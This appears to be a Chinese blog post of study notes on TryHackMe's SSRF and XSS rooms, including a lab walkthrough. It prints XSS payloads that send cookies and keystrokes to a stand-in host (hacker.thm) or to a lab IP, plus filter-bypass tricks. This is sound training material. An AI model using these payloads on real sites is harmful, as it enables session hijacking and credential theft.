前言
后期在打打CTFshow的靶场温习一下
Foreign friends please use Google Translate plugin to translate this article for better viewing
房间简介
在这个房间中,您将了解什么是SSRF、它们可以产生什么样的影响、您将查看一些 SSRF 攻击示例、如何发现 SSRF 漏洞、如何规避输入规则,然后我们为您提供了练习反对尝试你新发现的技能。
什么是 SSRF?
SSRF代表服务器端请求伪造。该漏洞允许恶意用户导致网络服务器向攻击者选择的资源发出额外的或经过编辑的 HTTP 请求。
SSRF的类型
SSRF漏洞有两种类型:第一个是常规 SSRF,其中数据返回到攻击者的屏幕。第二个是盲目 SSRF 漏洞,即发生 SSRF,但不会将任何信息返回到攻击者的屏幕。
有什么影响?
成功的SSRF攻击可能会导致以下任一情况:
- 进入未经授权的区域。
- 访问客户/组织数据。
- 能够扩展到内部网络。
- 显示身份验证令牌/凭据。
room:https://tryhackme.com/room/ssrfqi
笔记
SSRF示例
寻找SSRF
SSRF防御
SSRF实用
如tryhackme所说
将其他的照片改为私有
继续看tryhackme所说
并且尝试对内容进行解码
XSS
room:https://tryhackme.com/room/xss
什么是有效负载?
在XSS中,有效负载是我们希望在目标计算机上执行的 JavaScript 代码。有效负载有两个部分,意图和修改。
意图是您希望 JavaScript 实际执行的操作(我们将在下面的一些示例中介绍),而修改是对我们需要的代码进行更改,以使其执行,因为每个场景都不同(在完善中详细介绍了这一点)您的有效负载任务)。
以下是XSS意图的一些示例。
概念证明:
这是最简单的有效负载,您所需要做的就是证明您可以在网站上实现XSS 。这通常是通过在页面上弹出一个带有文本字符串的警告框来完成的,例如:
<script>alert('XSS');</script>
会话窃取:
用户会话的详细信息(例如登录令牌)通常保存在目标计算机上的 cookie 中。下面的 JavaScript 获取目标的 cookie,对 cookie 进行 base64 编码以确保成功传输,然后将其发布到黑客控制下的网站以进行记录。一旦黑客拥有这些 cookie,他们就可以接管目标的会话并以该用户的身份登录。
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
按键记录器:
下面的代码充当键盘记录器。这意味着您在网页上输入的任何内容都将被转发到黑客控制下的网站。如果网站将有效负载安装在接受的用户登录或信用卡详细信息上,这可能会造成很大的破坏。
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
商业逻辑:
这个有效负载比上面的例子要具体得多。这将涉及调用特定的网络资源或 JavaScript 函数。例如,假设有一个用于更改用户电子邮件地址的 JavaScript 函数,名为
。您的有效负载可能如下所示:
user.changeEmail() <script>user.changeEmail('attacker@hacker.thm');</script>
现在帐户的电子邮件地址已更改,攻击者可能会执行重置密码攻击。
接下来的四个任务将涵盖不同类型的XSS漏洞,所有这些漏洞都需要稍微不同的攻击负载和用户交互。
反射性XSS 基本上不用看因为反射性XSS提交漏洞别人根本不理 存储性XSS可以交个低危
下一关打lab
只要弹出THM即可进入下一关
第二关闭合input
下一关闭合textarea
下一关转义JavaScript
下一关的script被删除 双写绕过
下一关
出现了猫
进行检查
根据提示拿到flag
任务八
对票证检查闭合textarea
下一关需要调用cookie 建议边开攻击盒子和虚拟机
攻击盒子里开启端口
虚拟机里的网站填
</textarea><script>fetch('http://10.10.223.138:9001?cookie=' + btoa(document.cookie) );</script>
解码
提交cookie
暂无评论内容